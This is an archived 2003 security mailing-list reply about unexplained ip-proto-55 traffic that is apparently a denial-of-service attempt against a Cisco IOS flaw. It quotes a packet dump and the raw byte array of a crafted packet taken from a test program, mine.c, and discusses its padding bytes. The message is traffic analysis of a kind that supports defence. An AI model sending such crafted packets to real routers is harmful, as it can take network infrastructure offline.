Re: Cisco 0-day? [Was: strange protocol scans (and MOBP plug)]

From: Philippe Biondi (biondi@cartel-securite.fr)
Date: Sun Jul 20 2003 - 04:03:12 PDT

Next message: Keith: "RE: Windows XP Guest Account."

Previous message: Richard Johnson: "Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover"
In reply to: Michal Zalewski: "Cisco 0-day? [Was: strange protocol scans (and MOBP plug)]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Sat, 19 Jul 2003, Michal Zalewski wrote:

> On Sat, 19 Jul 2003, Michal Zalewski wrote:
>
> > This traffic is then followed by a storm of ip-proto-55 packets with
> > increasing TTLs from a similar source (this is exhibit #12 in the
> > museum, posted with full packet dumps and such). What's going on?
>
> I've just realized ip-proto-55 was one of the possible vectors for the
> latest Cisco IOS vulnerability, so it is possible that this particular
> aspect of the observed traffic is just a DoS attempt.
>
> The observed traffic seems to be considerably different from what is
> generated by the publicly available exploit (shadowchode, see
> http://www.netsys.com). This one generates considerably shorter packets
> with no payload, and increases TTL subsequently, see previous post:
>
> 22:53:00.340000 80.50.156.4 > 195.117.3.59: ip-proto-55 0 (ttl 2, id
> 60107)
>
> 	4500 0014 eacb 0000 0237 1b01 5032 9c04
>         c375 033b 0000 0000 0000 0000 0000 0000
>         0000 0000 0000 0000 0000 035a 383d
>
> I've isolated the packet, could anyone test
> http://lcamtuf.coredump.cx/mine.c against a vulnerable Cisco?

from mine.c:

unsigned char data[]={
0x45,0,0,0x14,0xfd,0xb1,0,0,0,0x37,0x08,0x1b,
80,50,156,4, /* bogus source */
0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0x23,0x12,0x77,0xaf};

The last line is ethernet padding, it should not be needed in the exploit
and may be the sign of an etherleak vulnerbility in your lan.

-- 
Philippe Biondi <biondi@ cartel-securite.fr> Cartel Sécurité
Security Consultant/R&D                      http://www.cartel-securite.fr
PGP KeyID:3D9A43E2  FingerPrint:C40A772533730E39330DC0985EE8FF5F3D9A43E2



----------------------------------------------------------------------------
Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the 
world's premier technical IT security event! 10 tracks, 15 training sessions, 
1,800 delegates from 30 nations including all of the top experts, from CSO's to 
"underground" security specialists.  See for yourself what the buzz is about!  
Early-bird registration ends July 3.  This event will sell out. www.blackhat.com
----------------------------------------------------------------------------

Next message: Keith: "RE: Windows XP Guest Account."
Previous message: Richard Johnson: "Re: Cisco IOS Denial of Service that affects most Cisco IOS routers- requires power cycle to recover"
In reply to: Michal Zalewski: "Cisco 0-day? [Was: strange protocol scans (and MOBP plug)]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jul 20 2003 - 10:46:36 PDT